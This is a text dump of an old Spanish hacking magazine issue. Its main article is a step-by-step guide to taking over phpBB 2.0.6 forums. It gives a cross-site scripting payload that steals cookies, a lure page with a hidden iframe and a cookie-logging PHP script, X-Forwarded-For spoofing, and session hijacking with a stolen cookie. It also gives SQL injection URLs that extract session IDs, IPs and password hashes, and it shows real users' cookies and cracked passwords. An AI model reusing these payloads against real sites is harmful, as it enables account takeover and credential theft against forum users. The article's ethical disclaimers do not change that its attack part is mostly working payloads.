Hxc22

2,560 views

Published on

Seguridad Informatica

1 Comment
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total views
2,560
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
62
Comments
1
Likes
0
Embeds 0
No embeds

No notes for slide

Hxc22

  1. 1. HACK X CRACK: HACKEANDO LOS FOROS PHPBB2 P P A A S S O O P A S Oa P A a a a a a a aa a a a a a NÚMERO 22 : especial de verano NÚMERO 22 : especial de verano hack paso a paso: ¿te atreves? R OS FO OS T O L RNE ND TE EA IN CK DE HA Nº 22 -- P.V.P. 4,5 EUROS 00022 8 414090 202756 P C PA S O A PA S O : C U R S O S O B R E F I R E WA L L S ( 1 ª E N T R E G A )
  2. 2. P A S O aa P A S Oaa aa a a aa a a a a a a aa Director de la Publicación EDITORIAL: EDITOTRANS S.L. J. Sentís C.I.F: B43675701 PERE MARTELL Nº 20, 2º - 1ª E-mail contacto 43001 TARRAGONA (ESPAÑA) director@hackxcrack.com Director Editorial I. SENTIS Diseño gráfico: E-mail contacto J. M. Velasco director@editotrans.com Título de la publicación Los Cuadernos de HACK X CRACK. E-mail contacto: Nombre Comercial de la publicacíón grafico@hackxcrack.com PC PASO A PASO Web: www.hackxcrack.com Dirección: PERE MARTELL Nº 20, 2º - 1ª. Redactores 43001 TARRAGONA (ESPAÑA) AZIMUT, ROTEADO, FASTIC, MORDEA, FAUSTO, ENTROPIC, MEIDOR, HASHIMUIRA, BACKBONE, ZORTEMIUS, AK22, DORKAN, KMORK, MAILA, TITINA, SIMPSIM... ... ... ... ... ¿Quieres insertar publicidad en PC PASO A PASO? Tenemos la mejor relación precio-difusión Contacto redactores del mercado editorial en España. Contacta con redactores@hackxcrack.com nosotros!!! Sr. Ruben Sentis Colaboradores Tfno. directo: 652 495 607 Mas de 130 personas: de España, de Brasil, de Tfno. oficina: 877 023 356 Argentina, de Francia, de Alemania, de Japón y E-mail: publicidad@editotrans.com algún Estadounidense. E-mail contacto colaboradores@hackxcrack.com Imprime I.G. PRINTONE S.A. Tel 91 808 50 15 4 Asalt ando los F or os de Int er net 11 Colabora con PC P aso a P aso DISTRIBUCIÓN: 19 Suscripciones a la R e vis t a SGEL, Avda. Valdeparra 29 (Pol. Ind.) 28018 ALCOBENDAS (MADRID) 24 Conoce los Fir e walls Tel 91 657 69 00 FAX 91 657 69 28 43 Ser vidor es de Hack x Crack WEB: www.sgel.es 65 N umer os atrasados TELÉFONO DE ATENCIÓN AL CLIENTE: 977 22 45 80 Petición de Números atrasados y Suscripciones (Srta. Genoveva) HORARIO DE ATENCIÓN: DE 9:30 A 13:30 (LUNES A VIERNES) © Copyright Editotrans S.L. NUMERO 22 -- PRINTED IN SPAIN PERIOCIDAD MENSUAL Deposito legal: B.26805-2002 Código EAN: 8414090202756 P IDE L O S NUMEROS ATRASADO S EN - - > WWW.HACKXCRAC K .C OM
  3. 3. aSALTANDO FOROS GUIA PASO A PASO Este artículo te permite tomar el control total de cualquier foro de Internet basado en PHPBB2 en su versión 2.0.6 Nuestra intención es la de siempre: ENSEÑAR. El conocimiento nos hace libres, no profanes jamás tu mente con actos que te desmerezcan Hola, de nuevo... preguntes qué es un foro. Un ejemplo vale más que mil palabras, Vamos a realizar un inciso en el curso así que pásate por www.hackxcrack.com y entra en el foro. de seguridad y firewalls para tomar un tema interesante, delicado y que se que Los foros son, hoy por hoy, una de las herramientas más utilizadas donde personas como tú o yo compartimos todo tipo de no va a caer en saco roto.... sudores me conocimientos y experiencias. La mayoría de comunidades tiene entran cuando recuerdo alguna tarde el suyo y es el punto de reunión de sus miembros. pensando en lo que nos pudo haber ocurrido.... Aunque hoy en día existen foros basados en todo tipo de lenguajes (PHP, C, Java, HTML… …) y para todas las plataformas (Linux, Este artículo persigue un objetivo final: Windows… …) hay uno destaca sobre todos los demás: el phpbb2 Entrar a un foro como administrador, (www.phpbb.com). Destaca porque está escrito en PHP, es software como moderador o como cualquier libre, es fácil de instalar y tiene un soporte realmente brutal (una otro usuario. inmensa comunidad de usuarios) y es utilizado por miles de comunidades en Internet. Para ello voy a describir varias técnicas, mediante enlaces maliciosos en un Como ya hemos comentado, en este artículo estudiaremos cómo post, creando una página web podemos “asaltar” la versión 2.0.6 de estos foros. Todos los que participamos en la creación de esta revista te pedimos que las “misteriosa” que nos dará los practicas que te enseñaremos hoy no sean utilizadas para destruir parámetros necesarios, utilizando técnicas ninguna comunidad. Practica cuanto quieras y aprende lo que de spoofing mediante proxys, puedas; pero por favor, no te dediques a hacer daño. manipular las cabeceras de http o “a lo bestia”, obtener el hash de cualquier Tienes 3 servidores de la revista a tu disposición para practicar. usuario y craqueándolo por fuerza bruta, En nuestro foro (www.hackxcrack.com) tienes sus IPs y todo y cómo no... inyectando HTML y SQL. eso… ya sabes Todas ellas tienen algo en común, utilizar un bug o varios bugs que han La dedicatoria de este artículo va dirigida ido descubriéndose para foros phpBB2, en esta ocasión a todos los moderadores concretamente para las versiones 2.0.6 y administradores de los foros de hackxcrack, que desde Diciembre del que era la de nuestro foro año pasado, llevo dándoles la brasa con ! Qué es un foro... esto... y que por razones obvias, no hicimos público en nuestros foros en su Qué es un foro, advertencias y servidores de prácticas!!! momento, ahora que ya está parcheado... y mejor no preguntes por qué se tardó Si eres un nuevo lector y no sabes mucho de Internet, quizás te tanto.... es una larga historia.... Página 4 PC PASO A PASO Nº 22
  4. 4. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Si.... 7 meses... 7 meses de fatigas serie de vulnerabilidades que nos “escudriñando” post, cambiando el permitirán: password frecuentemente, apoyándonos en otros usuarios que les hicimos ver Obligar a un administrador o moderador nuestros temores... en fin, un calvario. de un foro vulnerable a eliminar uno, Cada vez que me conectaba como varios o todos los post de “su foro”, sin administrador del foro pensaba... ya saberlo y sin darse cuenta verás... hoy es el día... nos pillaron... Obtener el hash de la contraseña de menos mal que no fue así. cualquiera que entre en el foro y tenga verificada la casilla de “entrar Este documento recoge en gran parte automáticamente en cada visita” esas experiencias, esos temores... y no Obtener el SID de usuario y el ID de solo porque cualquiera hubiera podido usuario y hasta la IP... y más cositas... loguearse como un usuario concreto (como Vic_Thor, como TuXeD, como Luego, usaremos una página web para .... cualquiera de nosotros, sino porque “automatizar” todo eso y hasta se hubiese podido BORRAR “despreocuparnos” todos los post del foro sin necesidad de entrar como administradores o Después... usaremos SQL injection moderadores.... sí, sí... en este artículo para realizar lo mismo y http spoofing también lo descubrirás, con un post para: “inofensivo” y con cierta mala leche, cuando un administrador o un moderador Averiguar la IP, el SID, la contraseña del foro lo lee, sin querer estará y lo que nos de la gana de cualquier eliminando los post que nos de la gana... usuario silenciosamente, sin preguntas, sin darse Seremos capaces de postear con IP cuenta y sin saber que es lo que pasó falsa, hasta con IP’s que no existen porque el mismo post que lanza el borrado se borrará... Y por último: Para realizar todas las prácticas y Combinaremos todo lo dicho aprovechar al máximo este artículo, anteriormente y entraremos al foro necesitaremos: como otro usuario, usando su IP, su nick, no será preciso saber su clave de Un proxy que permita modificar las acceso, pero conseguiremos todo lo dicho: cabeceras http ver sus mensajes privados, postear en Un foro vulnerable su nombre y si se trata de un Un Servidor Web que permita ejecutar administrador tendremos acceso a la scripts php joya de la corona en un foro... el panel Conocer un poquito... muy poquito de de administración. MySQL También, y dicho sea de paso, podremos Y el presente artículo... saltarnos los baneos (si fuimos excluidos) por IP, por nick... por lo que Vamos a empezar la casa por el tejado... nos de la real gana... y más... hasta vamos a empezar “descubriendo” una podemos.... me callo. PC PASO A PASO Nº 22 Página 5
  5. 5. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros en inyectar código, una simple inyección Como ves, todo lo dicho es bastante de un Java Script, el consabido Cross- delicado como para realizar las pruebas Site Scripting Vulnerability con foros reales y en marcha sobre los que no tenemos autorización a “practicar” Más información sobre el mismo lo puedes con este asunto. Por ello sería (repito de obtener en: nuevo) ideal construirte tu propio foro... http://www.securityfocus.com/bid/9290 y no es por dar más pistas... pero aplicando la misma técnica... hice lo propio con “otras cosas” que no son foros, concretamente con los usuarios de correo de terra o wanadoo... y otros más... sólo hay que pensar... Lo ideal es que te montes todo esto en casa... en tu red de pruebas, luego ya será el momento de “intentarlo” con otros.... no te lo recomiendo, no te incito a ello, ya sabes... deontología, ética y respeto al prójimo... pero hay que saber lo que nos podemos encontrar cualquier Vamos a “comprobarlo” con nuestros día. foros... Es cierto que en este artículo hay casos ! Pa ra cuando leas... reales, unos contra nuestros foros cuando eran vulnerables y otros contra.... Para cuando leas estas líneas, los Servidores de Pruebas bueno, ya lo verás... al finalizar el artículo de Hack x Crack ya deberían dar acceso a foros de pruebas encontrarás que este modesto servidor para que practiques. Para más información entró a un foro “guiri” como moderador www.hackxcrack.com del mismo sin serlo.... usurpando la identidad del verdadero moderata. Mientras escribo este artículo envié un Primero nos logueamos con nuestro nick mensaje privado a los moderadores de y password y NO verificamos la casilla ese foro (por cierto, aunque este artículo de Entrar automáticamente en cada sale ahora, se escribió en Mayo aunque visita... tuve que repetir las prácticas para obtener las pantallas con calidad suficiente) así que espero que hayan tomado las medidas correspondientes. Vamos a empezar.... Allá por finales de diciembre de 2003 a l e r t é a l o s a d m i n i s t ra d o r e s y moderadores del foro con un bug que en su día me pareció “significativo”, consiste Página 6 PC PASO A PASO Nº 22
  6. 6. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Una vez validados en el foro, accedemos Bien, ahora pinchamos en el link que a cualquier subforo y nos disponemos a acabamos de poner... y pasará esto: publicar un tema... o responder un post o un privado... cualquier sitio que nos deje postear algo... Y en el cuerpo del mensaje posteamos esto: Recibimos en nuestro navegador el http://www.hackxcrack.com/phpBB2/p resultado del script inyectado rivmsg.php?mode=%22><script>alert alert(document.cookie) (document.cookie);</script> De todo eso nos fijamos en lo que aparece rodeado con círculos rojos... El sid, el autologinid y el userid. El sid cambiará por cada conexión nueva que efectuemos con el foro, de momento no nos será de mucha ayuda, pero luego será imprescindible... El id, es 1011, es el numero de usuario que me corresponde... cada uno tenemos un valor constante y que se nos adjudica cuando nos registramos por primera vez. El autologinid, guardará el hash de la contraseña en MD5, siempre y cuando Y en lugar de publicarlo le damos a la el usuario haya iniciado su sesión vista preliminar... para no liarla verificando la casilla de entrada automática, no es nuestro caso, así que... no nos servirá de mucho, si hubiese entrado con la casilla verificada, vería esto: Esos dos círculos verdes encierran la cadena MD5 del hash de mi contraseña, que para e s t e c a s o e s : cf99847d2cd8fb4f1178139764bb19c8 si nos la llevamos a un cracker de MD5 sacaremos la contraseña, (cuando explique todo, veremos como se craquean....) PC PASO A PASO Nº 22 Página 7
  7. 7. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Claro, que esto sólo será así si el creáis... hay un problema: el %22 del usuario entro con la casilla link, que no es otra cosa que la inyección verificada... y además... esto se envía HTML para el script privmsg.php, a nuestro propio navegador, lo que sería equivale a las comillas dobles (“) y si en interesante es que nos enviase la cookie ese script ponemos cualquier cosa que a un servidor web y que la podamos lleve comillas simples o dobles, deja de recibir, ya sea la nuestra o la de otro funcionar. usuario, bueno, por el momento nos quedamos con “el concepto” Y no valen las formas ” ni nada de eso... es una lata... Ahh!! Y si queréis probar Más adelante veremos que con el también funciona con viewtopic.php, SID y con la IP de cualquier usuario editprofile.php, etc.... podremos loguearnos como si fuéramos él... Así que nos creamos una web en un sitio cualquiera (yo me lo creo en mi propio De lo que se trata ahora es que tras webserver, pero lo puedes subir a publicar un post “de verdad” nos envíe cualquier sitio que soporte php y pirula las cookies de todo quisqui que se pase igual de bien). El código html de esa web por el hilo... y de preparar un servidor es el que sigue y el archivo lo llamé web que reciba las cookies, los sid y todo miramiweb.html eso... y claro.. también tendremos que sacar su IP, con esos datos estaremos en condiciones de conectarnos al foro como si fuésemos el verdadero usuario, vamos a construir esa web... Primero nos montamos nuestro servidor, Apache, IIS, el que nos de la gana; pero hay que instalarlo con soporte a php, A su vez llama a otro archivo cuyo nombre puesto que vamos a usar un pequeño es miramiweb2.html script para que almacene en nuestro webserver las cookies de los que nos van leyendo el post. Obviamente hay que publicar un post en cualquier foro “animando” a visitar esa web, nada difícil, un inofensivo link a una web “aparentemente” estupenda... o de esas cosas que vemos por los foros de Que también usa otra página de nombre “esta es mi web espero vuestros video.html comentarios....”, hasta puede ser un link “dirigido”... luego veremos más... de momento lo simple. El asunto es cómo pasar la cookie a un webserver, no es tarea fácil, no Página 8 PC PASO A PASO Nº 22
  8. 8. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Cuando se cierra la página principal, El iframe fr1 carga el contenido de una se ejecuta un script php de nombre página del foro junto con la inyección roba_cookie.php y su código es: HTML que utiliza el bug, y la cookie, en lugar de mostrarla con un alert(document.cookie) se pasa a la barra de estado del n a v e g a d o r, window.status=docuument.cookie. Es intencionado, podríamos haberlo puesto en otro sitio que no se viese o almacenarla en una variable y usarla después... pero como esto es un ejemplo, así vemos qué va ocurriendo.... Por último existe un form llamado Escribe_lo, que se lanzará inmediatamente después de cerrar la ventanita de la web maliciosa y además hace la llamada a la función juas() que como dijimos antes le pasará el contenido Ya sé hay mucho que mejorar, pero es de window.status (que ya tendrá la rápido y funciona cookie) al script roba_cookie.php, Bueno, expliquemos un poquito el Esto es importante que sea así, bueno código... para los despistados y para hay otras formas, pero elegí esta. El caso ponernos en situación: es que como tardará unos segundos en cargar la página del foro, si intentamos pasar la cookie antes de que lo haga, no El Archivo miramiweb.html la cazaremos, por eso se ejecuta con el método onunload y por eso en la web Es la página principal e incluye una función maliciosa hay vídeos, fotos, etc... hay denominada juas, que invoca al método que dar tiempo a que se cargue la open cuando se la llame y ejecuta el página del foro dentro del iframe fr1 script roba_cookie.php pasándole como (te recuerdo que no lo verás porque tiene parámetro el contenido que exista en el un tamaño de 0 x 0) objeto window.status... cuando veamos un caso práctico se entenderá mejor. Si quieres modifica width y height del iframe fr1 y verás que aparece una Utiliza dos iframes, uno que “se ve” y página del foro que lo llamé fr2, y otro que “no se ve” y que lo llamé fr1. El archivo miramiweb2.html El iframe fr2 carga el contenido de la Este no tiene ningún misterio, pagina miramiweb2.html (que es lo simplemente visualiza una foto y muestra que veremos cuando se llame a la página un link para ver “los mejores vídeos del principal) mundo”, el contenido de este archivo se mostrará en el iframe fr2 PC PASO A PASO Nº 22 Página 9
  9. 9. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros El archivo video.html Cuando los usuarios que pinchen en el enlace del post, les aparecerá otra Menos misterio aún... es eso... un simple ventanita en el navegador... esta: video... El archivo roba_cookie.php Es un script php que grabará un archivo de texto con la IP del personaje que visitó nuestra web y la cookie que le pasó la función juas() en el archivo miramiweb.html. Observa que se pasa como parámetro window.status La variable la_cookie: es quien almacenará el contenido de window.status que se recibió como parámetro. Como ves (rodeado en rojo) se muestra La variable ipu: es la IP del que la cookie en la barra de estado nos visita y se recoge de la cabecera (window.status) tal y como le X-Forwarded-For. explicamos en el iframe fr2. Cómo!!! Qué no sabes como funciona el Nuestros visitantes visitan nuestra web, script... venga.... que está explicado en pasean por los enlaces... disfrutan con el curso de php que llevamos en la los vídeos... etc... mientras tanto en el Revista... iframe fr2 ya se cargó por completo el script con la inyección HTML, ahora se Bueno, pues vamos a ver como funciona ve... en la barra de estado, por eso decía todo y lo damos por zanjado... yo lo de hacerlo “mas discreto”, pero eso... esto es un ejemplo... Primero, posteamos en un foro “el reclamo” para que visiten nuestra web... Cuando nuestro/s visitantes cierren esa ventana o “salgan” de nuestra web, se invocará el método onunload, se ejecutará la función juas() y se llamará al script roba_cookie.php. En el servidor web pasó esto: Se creó un a r c h i v o l l a m a d o captura.txt tal y como debía realizar n u e s t r o programa en php. Página 10 PC PASO A PASO Nº 22
  10. 10. ¿QUIERES COLABORAR CON PC PASO A PASO? PC PASO A PASO busca personas que posean conocimientos de informática y deseen publicar sus trabajos. SABEMOS que muchas personas (quizás tu eres una de ellas) han creado textos y cursos para “consumo propio” o “de unos pocos”. SABEMOS que muchas personas tienen inquietudes periodísticas pero nunca se han atrevido a presentar sus trabajos a una editorial. SABEMOS que hay verdaderas “obras de arte” creadas por personas como tu o yo y que nunca verán la luz. PC PASO A PASO desea contactar contigo! NOSOTROS PODEMOS PUBLICAR TU OBRA!!! SI DESEAS MÁS INFORMACIÓN, envíanos un mail a empleo@editotrans.com y te responderemos concretando nuestra oferta.
  11. 11. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros si vemos el contenido de ese archivo.... Ya lo sabes... así con los demás... Pero... ¿y qué pasó con el tercero? De ese no tenemos el hash... o sea que no podemos... JA, eso es lo que le dijo el lobo a los tres cerditos... CLARO QUE PODEMOS, pero antes de explicar cómo, necesito explicar Ahora tenemos las cookies de los tres “dos tonterías” acerca de cómo falsear la “inocentes” que visitaron la web... los IP en un foro... bueno y en más sitios, dos primeros usaron la entrada pero lo que nos afecta en este cado es automática, por tanto obtenemos los un foro. hashes (lo que viene tras autologinid....) de las contraseñas y sólo hace falta Vamos a necesitar dos cosas... Achilles pasarlas por el crakeador que más rabia o proxomitron nos de.... http://packetstormsecurity.nl/web/achilles-0-27.zip Por ejemplo Cain... http://www.oxid.it http://www.proxomitron.info/files/download/ProxN45j.exe http://www.pluto.dti.ne.jp/~tengu/proxomitron/files/ProxN45.zip Y el parche a español en: http://www.nautopia.net/estaticos/descargas/proxomitron/ProxN45-Spa.zip Lo haremos con Proxomitron... que automatiza más la tarea, aunque si y ya... tenemos que para uno de los queremos “observar” paso a paso todo usuarios el password es mitesoroenhxc lo que ocurre, está bien lo de Achilles, y para el otro es kuli2 pero te hartarás de modificar un paquete de datos tras otro... Ahhh, que no sabes el nick... venga hombre... accedes al foro, como usuario E s t o e s m u y f á c i l d e i n s t a l a r, o como invitado, y escribes esto, en el descomprimes el .zip en un directorio, caso del user 1011 (ese número después descargas la traducción a español corresponde al userid que nos suministró y sustituyes el archivo ejecutable del la cookie) directorio en el que lo instalaste por el http://www.hackxcrack.com/phpBB2/profile.php?mode=viewprofile&u=1011 de la versión en español, yo lo tengo en la carpeta D:proxo Página 12 PC PASO A PASO Nº 22
  12. 12. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Lanzamos el ejecutable y en la barra de tareas o en la bandeja del sistema aparecerá su icono... pinchamos dos veces sobre él o botón derecho y abrir proxomitron Elegimos el puerto (uno que no esté en uso, a mi me dio por el 9000) y aumentamos el tiempo de conexiones locales a 3600 segundos (una hora) Aceptamos y volveremos a la pantalla Al abrirse, desmarcaremos todas las en la que empezamos. opciones excepto la de encabezados salientes: Ahora Pincharemos en Encabezados Bajamos hasta el final con la barra de deslizamiento que hay a la derecha en la zona blanca y verificamos X- Forwarded-For (out), sólo de salida, Pinchamos en Configurar y en la ficha le damos a editar y en el recuadro que HTTP pone Reemplazar por este Texto ponemos 1.1.1.1 PC PASO A PASO Nº 22 Página 13
  13. 13. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros ! En los números... En los números anteriores revista ya se han publicado muchas formas de falsear tu IP, esta es otra más Voy a poneros una captura de pantalla del panel de administración del foro, en el que se ven las IP’s de los usuarios que hay conectados... Aceptamos, Aplicamos, Aceptamos y cerramos la ventanita del Proxomitron si queremos... o la dejamos tal cual, como prefieras. Ahora configuramos nuestro navegador para que las conexiones salientes pasen por el proxomitron... y le indicamos que usaremos un proxy Ozú!!! Acabamos de descubrir varias con IP 127.0.0.1 por el puerto 9000, cosas... que podemos ponernos la IP que es el que le pusimos al proxomitron que nos venga en gana, byes, byes a en Configurar los baneos por IP, hasta podemos postear con la IP de otro... Hasta nos puede dar por usar una que no exista... ¿y si le ponemos otra cosa? Por ejemplo: Wadalbertia , vamos a ver... configuremos el proxomitron para que nuestra IP sea Wadalbertia... o La pantera Rosa, cada uno a lo suyo Aceptamos, Cerramos .... y abrimos el navegador Página 14 PC PASO A PASO Nº 22
  14. 14. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Y Aceptamos....Aplicamos y La víctima es un compañero... esta vez Aceptamos.... él no lo sabe... la primera vez que lo hice me sirvió Yorkshire como conejillo de Ahora vamos a navegar a una de esas indias... esta vez es Grullanetx, sorry y webs que nos dicen la IP y los proxys un abrazo, amigo.... que usamos.... Primero ponemos su IP en el Por ejemplo a www.showmyip.com proxomitrón como ya hemos aprendido... (quité los primeros octetos... para que no se me mosquee mucho) Jajaja, nuestra IP es muy cachonda... hasta podemos cambiar más cosas como el user-agent y ponernos que usamos un sistema operativo Güindos 33, pero... que hará el foro? Luego, vamos al filtro de encabezados http y buscamos uno que dice Cookie: Pues lo que pueda... como no resolverá Fake a cookie (out) y verificamos la esa IP lo más probable es que mantenga casilla de Salida y le damos a Editar la última con la que entramos, (la 1.1.1.1) o igual le da por ponernos otra... pero bueno, eso no es lo que nos interesa... nos interesa loguearnos con la IP verdadera de otro... Como tenemos las cookies en nuestro archivo captura.txt lo que tenemos que hacer es lo siguiente: Las copiaremos y nos la llevamos al proxomitron También cambiaremos la IP del usuario de esa cookie Realmente nos vale con el SID y la IP, En la pantalla de edición de la cookie falsa vamos a ello: reemplazamos por la cookie que le PC PASO A PASO Nº 22 Página 15
  15. 15. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros robamos anteriormente, no hace falta que sepamos su password, ni tampoco que él verificase la casilla de entrada a u t o m á t i c a . . . d a l o m i s m o. . . . l phpbb2mysql_t=a:1:{i:15405;i:1087417130;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:4:"2687";}; phpbb2mysql_sid=f0a98ea57ea60586a4eedd688e9c2d2f Lo copiamos y se lo pegamos en reemplazar texto A partir de ahora podemos hacer lo que queramos en nombre de Grullanetx, postear, verle los privados (mmm, yo no hice nada de eso) o podemos cambiarle el perfil... y su password verdadera por otra nueva... y él será quien no pueda Y como siempre, Aceptamos, entrar... pero eso no está bien. Aplicamos y Aceptamos... ESTO ES IMPORTANTE!!! Para que todo vaya bien, debemos desconectarnos como usuarios registrados del Foro, cerrar todas las ventanas del navegador (por si acaso) y abrir una nueva... Accedemos al foro normalmente... como invitados... http://www.hackxcrack.com/phpBB2/index.php Y SORPRESA !!!!!! Entramos como Grullanetx sin pasar Bueno, todo esto está muy bien... y muy por el login, a lo peor, tendremos que elaborado, pero... ¿qué hay de esa actualizar o pinchar en Foros de inyección SQL? discusión... en cualquier caso, estaremos logueados como Grullanetx sin saber Pues ahora vamos... resulta que con ni su pass, ni esperar a craquearlo esta técnica nos va a sobrar el asunto de Página 16 PC PASO A PASO Nº 22
  16. 16. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros la web maliciosa, el script, el servidor Acabamos de ver que Grullanetx es el web y la madre del cordero. user 3840 Tenemos que averiguar dos cosas: Ahora escribimos todo el churro ese (que es una consulta a la BBDD del 1º) Averiguar la IP, eso para un mod foro vulnerable) y ponemos el número o admin es fácil, pero cualquier user 3840 donde dice ID_DEL_USUARIO también lo puede hacer, basta poner un y nos dará la IP avatar o firma que apunte a su webserver y cazará las de todo quisquii que pase por ese hilo o.... usar esto: http://www.hackxcrack.com/phpBB2/p rivmsg.php?folder=savebox&mode=rea d&p=99&pm_sql_user=AND%20pm.pri y cuando pulsemos enter: v m s g s _ t y p e = - 99%20UNION%20SELECT%20session_ user_id,session_ip,session_ip,session_i p,session_ip,session_ip,session_ip,sess ion_ip,session_ip,session_ip,session_ip ,session_ip,session_ip,session_ip,sessi on_ip,session_ip,session_ip,session_ip, session_ip,session_ip,session_ip,sessio n_ip,session_ip,session_ip,session_ip,s ession_ip,session_ip,session_ip,session Intencionadamente eliminé el primer _ip,session_ip,session_ip%20FROM%2 octeto, nos muestra la Ip en formato 0phpbb2_sessions%20WHERE%20sess Hexadecimal, que en decimal ion_user_id=ID_DE_USUARIO%20LI punteado sería MIT%201/* XXX sería el valor hexadecimal omitido, ID_DEL_USUARIO: Será el Identificador el de los cuadraditos rojos.. constante... el userid, ese no CAMBIA YYY sería el valor hexadecimal omitido, NUNCA, por ejemplo para AZIMUT el el de los cuadraditos amarillos 2, para Vic_Thor el 1011, basta con pulsar en el nick de cualquier usuario 46 es 70 en decimal - botón derecho del ratón- propiedades y... 9F es 159 en decimal Por lo que tenemos que la IP de Grullanetx es: XXX.YYY.70.159 Ni que decir tiene, que sale toda completita 2º) Averiguar el sid, mmm esto parece más complicado, podemos hacerlo de varios modos, PC PASO A PASO Nº 22 Página 17
  17. 17. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros A.- El que yo puse con la web "chunga" y luego que se puede usar de paso para cazar las IP’s B.- la inyección SQL... pero "modificada", veamos: La tabla que guarda las sesiones activas es phpbb2_sessions, en los ejemplos que vienen a continuación pone phpbb y no phpbb2 como en este foro, sólo session_id es el campo que guarda el eso... es de un foro de pruebas que tengo sid y session_user_id el identificador montado en casa... (3840 para Grullanetx, 1011 para mi, 2 para azimut... lo de antes...) Luego la inyección sql es: http://www.hackxcrack.com/phpBB2/pr ivmsg.php?folder=savebox&mode=read &p=99&pm_sql_user=AND%20pm.priv m s g s _ t y p e = - 99%20UNION%20SELECT%20session_ user_id,session_id,session_id,session_i d,session_id,session_id,session_id,sessi on_id,session_id,session_id,session_id, session_id,session_id,session_id,sessio n_id,session_id,session_id,session_id,s ession_id,session_id,session_id,session _id,session_id,session_id,session_id,ses sion_id,session_id,session_id,session_i d,session_id,session_id%20FROM%20p hpbb2_sessions%20WHERE%20session _user_id=ID_DEL_USUARIO%20LIMIT %201/* Lo tecleamos y.... Página 18 PC PASO A PASO Nº 22
  18. 18. SUSCRIBETE A PC PASO A PASO 45 EUROS (10% DE DESCUENTO) SUSCRIPCIÓN POR: + 1 AÑO = SORTEO DE UNA CONSOLA XBOX + 11 NUMEROS SORTEO 2 JUEGOS PC (A ELEGIR) C o n t r a R e e m b o l s o Giro Postal Solo tienes que enviarnos un mail a preferente@hackxcrack.com Envíanos un GIRO POSTAL por valor de 45 EUROS a: indicando: CALLE PERE MARTELL20, 2º 1ª. - Nombre CP 43001 TARRAGONA - Apellidos ESPAÑA - Dirección Completa IMPORTANTE: En el TEXTO DEL GIRO escribe un mail de contacto - Población o un número de Teléfono. - Provincia - Cógigo Postal Y enviarnos un mail a preferente@hackxcrack.com indicando: - Mail de Contacto y/o Teléfono Contacto - Nombre Es imprescindible que nos facilites un mail o teléfono de contacto. - Apellidos - Tipo de Subscripción: CONTRAREEMBOLSO - Dirección Completa - Número de Revista: - Población Este será el número a partir del cual quieres subscribirte. Si deseas - Provincia - Cógigo Postal (por ejemplo) subscribirte a partir del número 5 (incluido), debes poner un 5 y te enviaremos desde el 5 hasta el 15 (ambos incluidos) - Mail de Contacto y/o Teléfono Contacto Es imprescindible que nos facilites un mail o teléfono de contacto. APRECIACIONES: - Tipo de Subscripción: GIRO POSTAL * Junto con el primer número recibirás el abono de 45 euros, precio - Número de Revista: de la subscripción por 11 números (un año) y una carta donde se te Este será el número a partir del cual quieres subscribirte. Si deseas indicará tu número de Cliente Preferente y justificante/factura de la (por ejemplo) subscribirte a partir del número 5 (incluido), debes poner subscripción. un 5 y te enviaremos desde el 5 hasta el 15 (ambos incluidos) * Puedes hacernos llegar estos datos POR MAIL,tal como te hemos indicado; rellenando el formulario de nuestra WEB APRECIACIONES: (www.hackxcrack.com) o enviándonos una carta a la siguiente dirección: * Junto con el primer número recibirás una carta donde se te indicará CALLE PERE MARTELL Nº20, 2º-1ª tu número de Cliente Preferente y justificante/factura de la subscripción. CP 43001 TARRAGONA * Puedes hacernos llegar estos datos POR MAIL,tal como te hemos ESPAÑA indicado; o enviándonos una carta a la siguiente dirección: * Cualquier consulta referente a las subscripciones puedes enviarla CALLE PERE MARTELL Nº20, 2º-1ª por mail a preferente@hackxcrack.com CP 43001 TARRAGONA ESPAÑA * Cualquier consulta referente a las subscripciones puedes enviarla por mail a preferente@hackxcrack.com
  19. 19. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Obviamente el usuario a spoofear debe tanto el tiempo, pero en fin, te pondré el estar logueado en ese momento, en código de inyección: caso contrario hallaremos un sid nulo o inválido.... ah!!! que está oculto, no pasa http://www.hackxcrack.com/phpBB2/pr nada... cualquiera puede comprobarlo ivmsg.php?folder=savebox&mode=read sin necesidad de ser admin &p=99&pm_sql_user=AND%20pm.priv m s g s _ t y p e = - Bueno, ya tenemos esto: 99%20UNION%20SELECT%20usernam e,user_password,user_password,user_p usuario: Grullanetx assword,user_password,user_password ,user_password,user_password,user_pa IP: XXX.YYY.70.59 ssword,user_password,user_password, user_password,user_password,user_pa ID: 3840 ssword,user_password,user_password, user_password,user_password,user_pa SID: f0a98ea57ea60586a4eedd68 ssword,user_password,user_password, 8e9c2d2f (que es lo que nos dio el sql user_password,user_password,user_pa inyection de las tablas session y que varía ssword,user_password,user_password, por cada vez que se loguea.. o sea, que user_password,user_password,user_pa hay que hacerlo "en el momento que se ssword,user_password,user_password le vea..." %20FROM%20phpbb2_users%20WHER E%20username='Grullanetx'%20LIMIT Pues ahora sólo nos falta completar la %201/* cookie y ponerla en el proxomitron como aprendimos.... a esto le pegamos Con este no te hace falta ni conocer el el SID obtenido y le cambiamos el userid userid... directamente el nombre del usuario y ZAS, el hash en MD5 del usuario phpbb2mysql_t=a:1:{i:15405;i:1087417130;}; en tu navegador... luego al crack.... phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:4:"2687";}; phpbb2mysql_sid= Luego nos quedará así: phpbb2mysql_t=a:1:{i:15405;i:1087417130;}; 